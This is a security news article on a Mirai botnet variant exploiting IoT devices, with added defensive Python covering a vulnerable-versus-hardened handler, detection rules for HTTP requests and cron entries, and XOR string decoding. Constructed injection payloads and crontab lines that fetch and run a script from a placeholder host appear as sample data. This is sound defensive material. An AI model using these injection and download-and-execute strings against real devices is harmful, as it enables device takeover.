Security Alert: Enhanced Mirai Botnet Exploits Critical Vulnerabilities in IoT Devices

CyberSecureFox 🦊

Security researchers at Akamai have uncovered a new variant of the Mirai botnet that specifically targets DigiEver DS-2105 Pro video recorders and outdated TP-Link and Teltonika routers. The campaign, which began in October 2024, combines several years-old vulnerabilities with fresh malware tooling and shows that unpatched, internet-exposed IoT devices remain an easy source of botnet capacity.

Technical Analysis of the Attack Vector

The primary attack vector is a command injection vulnerability in DigiEver DVR devices, reachable through the /cgi-bin/cgi_main.cgi component, which leads to Remote Code Execution (RCE). The handler does not validate the ntp parameter before using it in a system command, so a crafted HTTP POST request whose ntp value contains shell metacharacters followed by attacker-chosen commands is executed on the device. The flaw had not been assigned a CVE identifier at the time of Akamai's report. The injected commands are not sophisticated: they use curl to download the bot binary and chmod to make it executable before launching it.
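As an added illustration (not code from DigiEver's firmware or from Akamai's report), the following Python reproduces the anti-pattern behind the bug beside a hardened version of the same handler. The request bodies, the 192.0.2.10 host and the x.sh file name are constructed placeholders, not indicators from the campaign; the `ntpdate` command name is an assumption about what such a handler would run. The vulnerable function only builds the command string it would hand to a shell, it does not execute anything.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed request bodies in the shape the page describes: an NTP host
# followed by injected shell commands that fetch and run a dropper.
INJECTED_BODY = ("ntp=pool.ntp.org;cd+/tmp;curl+-O+http://192.0.2.10/x.sh;"
                 "chmod+777+x.sh;sh+x.sh")
BENIGN_BODY = "ntp=time.example.net"


def parse_form(body: str) -> Dict[str, str]:
    """Minimal application/x-www-form-urlencoded parser (first value wins)."""
    fields: Dict[str, str] = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), unquote_plus(value))
    return fields


def build_vulnerable_command(body: str) -> str:
    """The anti-pattern behind the bug: the decoded ntp value is pasted into a
    command string that the firmware would then hand to a shell (system(),
    popen()), so ';' starts a second, attacker-chosen command.
    The string is returned for inspection, never run."""
    ntp = parse_form(body).get("ntp", "")
    return f"ntpdate {ntp}"  # hypothetical command; the injection is in {ntp}


# RFC 1123 host name (also matches dotted IPv4): labels of letters, digits and
# hyphens, no leading/trailing hyphen, at most 253 characters overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def validate_ntp_host(value: str) -> Optional[str]:
    """Allow-list the decoded parameter. Anything outside the host-name grammar
    (shell metacharacters, whitespace, URLs) is rejected, not sanitized."""
    return value if HOSTNAME_RE.fullmatch(value) else None


def build_hardened_argv(body: str) -> Optional[List[str]]:
    """Hardened handler: validate first, then build an argv list so the value
    reaches the program as one argument. The caller runs it with
    subprocess.run(argv, shell=False); None means answer with HTTP 400."""
    host = validate_ntp_host(parse_form(body).get("ntp", ""))
    if host is None:
        return None
    return ["ntpdate", host]


if __name__ == "__main__":
    print("vulnerable builds:", build_vulnerable_command(INJECTED_BODY))
    print("hardened, injected:", build_hardened_argv(INJECTED_BODY))
    print("hardened, benign:  ", build_hardened_argv(BENIGN_BODY))
```

The important design choice is the allow-list: the hardened handler does not try to strip `;` or `|` from the value (a deny-list that attackers routinely bypass with `$()`, backticks or newlines); it accepts only a syntactically valid host name and passes it as a single argv element, so the shell never sees it.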

Expanded Attack Surface and Propagation Methods

Beyond DigiEver devices, this Mirai variant actively exploits further known vulnerabilities, including CVE-2023-1389, a command injection in TP-Link Archer AX21 routers, and CVE-2018-17532, an OS command injection in Teltonika RUT9XX routers. Once a device is compromised, the malware installs a cron job so that it is relaunched after a reboot or after its process is killed, giving the operators sustained control over the device.
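Detection logic for the two behaviours described above (the crafted POST to /cgi-bin/cgi_main.cgi and cron-based persistence), as an added example that is not from Akamai's report and not a signature published by any vendor. The raw HTTP requests and the crontab dump are constructed; the 192.0.2.x addresses, file names and schedules are placeholders, not campaign indicators. The rules are heuristics: shell metacharacters or download tools inside the ntp parameter, and cron entries that execute from world-writable directories or pull content from the network.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed raw HTTP requests, as a reverse proxy or PCAP export would show
# them. The first is shaped like the exploit the page describes, URL-encoded.
REQUESTS = [
    "POST /cgi-bin/cgi_main.cgi HTTP/1.1\r\nHost: 192.0.2.50\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "ntp=pool.ntp.org%3Bcd+%2Ftmp%3Bcurl+-O+http%3A%2F%2F192.0.2.10%2Fx.sh"
    "%3Bchmod+777+x.sh%3Bsh+x.sh",
    "POST /cgi-bin/cgi_main.cgi HTTP/1.1\r\nHost: 192.0.2.50\r\n\r\n"
    "ntp=time.example.net",
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.50\r\n\r\n",
]

# Constructed crontab dump from a device; the dropper paths are placeholders.
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /tmp/.x/bin >/dev/null 2>&1
@reboot wget -q http://192.0.2.10/x.sh -O /var/tmp/x.sh; sh /var/tmp/x.sh
"""

SHELL_META = re.compile(r"[;&|`$(){}<>\s]")
DOWNLOADER = re.compile(r"\b(curl|wget|tftp|busybox)\b")
TMP_EXEC = re.compile(r"(?:^|[\s;|&=])(?:/tmp|/var/tmp|/dev/shm)(?:/|\b)")


def parse_form(body: str) -> Dict[str, str]:
    """Minimal application/x-www-form-urlencoded parser (first value wins)."""
    fields: Dict[str, str] = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), unquote_plus(value))
    return fields


def flag_cgi_request(raw: str) -> Optional[List[str]]:
    """Return the reasons a request looks like the cgi_main.cgi injection,
    or None for requests that do not match. Decoding happens before matching
    so URL-encoded metacharacters are not missed."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split()
    if len(parts) < 2 or parts[0] != "POST":
        return None
    if not parts[1].startswith("/cgi-bin/cgi_main.cgi"):
        return None
    ntp = parse_form(body).get("ntp", "")
    reasons = []
    if SHELL_META.search(ntp):
        reasons.append("shell metacharacter in ntp parameter")
    if DOWNLOADER.search(ntp):
        reasons.append("download tool referenced in ntp parameter")
    if TMP_EXEC.search(ntp):
        reasons.append("world-writable directory referenced in ntp parameter")
    return reasons or None


def flag_cron_lines(crontab: str) -> List[Tuple[str, List[str]]]:
    """Flag crontab entries typical of IoT malware persistence: executing
    from /tmp, /var/tmp or /dev/shm, or fetching content with a downloader."""
    flagged = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if TMP_EXEC.search(line):
            reasons.append("executes from world-writable directory")
        if DOWNLOADER.search(line):
            reasons.append("downloads content at schedule time")
        if reasons:
            flagged.append((line, reasons))
    return flagged


if __name__ == "__main__":
    for req in REQUESTS:
        print(req.split("\r\n", 1)[0], "->", flag_cgi_request(req))
    for line, why in flag_cron_lines(CRONTAB):
        print("cron:", line, "->", why)
```

A benign request to the same endpoint with a plain host name produces no alert, which is what keeps such a rule usable on a device that legitimately lets administrators set an NTP server. On a real fleet the cron check belongs in a periodic configuration audit of each device, since the web logs of a compromised DVR are themselves under the attacker's control.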

Advanced Technical Capabilities

This iteration of Mirai shows notable changes in its technical architecture: it uses both XOR and ChaCha20 encryption to conceal its internal data, which complicates static analysis and signature matching compared with the single-byte XOR obfuscation of the original Mirai source. The malware is built for x86, ARM and MIPS, so one campaign can cover most of the CPU architectures found in consumer and small-business IoT devices, which substantially expands its potential target base.
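To make the XOR part concrete, here is an added Python example (not code from Akamai's analysis or from the malware) of how the original Mirai source obfuscates its string table and how an analyst recovers the key from a dumped sample. In the leaked Mirai `table.c` each byte is XORed in turn with the four bytes of a 32-bit key, which collapses to one byte (0x22 for the classic key 0xDEADBEEF). Whether this variant keeps that scheme, and which key it uses, is not stated in the report; the key and the sample strings below are assumptions chosen to resemble Mirai's configuration strings, and the ChaCha20 layer is not covered here.

```python
import string
from typing import List

CLASSIC_TABLE_KEY = 0xDEADBEEF  # key from the leaked Mirai source; an assumption for this variant


def effective_key_byte(table_key: int = CLASSIC_TABLE_KEY) -> int:
    """Mirai's toggle_obf() XORs every byte with k1, k2, k3, k4 (the four key
    bytes) one after another, which is the same as XOR with k1^k2^k3^k4."""
    return (table_key ^ (table_key >> 8) ^ (table_key >> 16) ^ (table_key >> 24)) & 0xFF


def table_xor(data: bytes, table_key: int = CLASSIC_TABLE_KEY) -> bytes:
    """Encode or decode a string-table entry (XOR is its own inverse)."""
    k = effective_key_byte(table_key)
    return bytes(b ^ k for b in data)


# Bytes expected in decoded config strings: paths, commands, credentials and
# the NUL terminator that ends each table entry.
ALLOWED = set(string.ascii_letters.encode() + string.digits.encode()
              + b" /._-:" + b"\x00")


def guess_xor_key(blob: bytes) -> int:
    """Recover a single-byte XOR key from a dumped, still-encoded table: try all
    256 keys and keep the one whose output stays inside the expected alphabet.
    Bytes outside it are penalised so a near-miss key cannot tie."""
    def score(k: int) -> int:
        return sum(1 if (b ^ k) in ALLOWED else -3 for b in blob)
    return max(range(256), key=score)


def split_strings(decoded: bytes) -> List[str]:
    """Split a decoded table on its NUL terminators."""
    return [s.decode("ascii", "replace") for s in decoded.split(b"\x00") if s]


# Constructed sample resembling Mirai's NUL-terminated table entries, encoded
# with the classic key. Not extracted from the variant Akamai analysed.
PLAIN_STRINGS = [b"/dev/watchdog", b"/bin/busybox", b"shell", b"enable",
                 b"/proc/self/exe", b"GET / HTTP/1.1"]
ENCODED_SAMPLE = table_xor(b"\x00".join(PLAIN_STRINGS) + b"\x00")


if __name__ == "__main__":
    key = guess_xor_key(ENCODED_SAMPLE)
    print(f"recovered key byte: 0x{key:02x}")
    for s in split_strings(table_xor(ENCODED_SAMPLE, key)):
        print(" ", s)
```

`guess_xor_key` takes a raw key byte, so it works on any single-byte XOR scheme, not only the four-byte Mirai folding; passing the recovered byte straight to `table_xor` works because `effective_key_byte` of a value below 0x100 is that value itself.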

Key Capabilities

The botnet's capabilities include automated exploitation of the vulnerabilities listed above, brute-forcing of weak or default login credentials (the spreading method Mirai has used since its original release), and DDoS attack modules. Together these make it effective at both initial compromise and everything that follows: scanning for and infecting further devices from each victim, and launching coordinated attacks on command.

Security experts advise implementing protective measures now: apply available firmware updates, replace default credentials with strong passwords, and keep administrative interfaces such as the DVR web UI off the internet, reachable only from a management network or VPN. Organizations should audit their IoT infrastructure, particularly DVR systems and network devices, for end-of-life models that will never receive a fix, and plan to replace them. Network segmentation limits how far an infected device can scan, and continuous monitoring of outbound connections and scheduled tasks on these devices can catch a compromise that the device itself will not report.
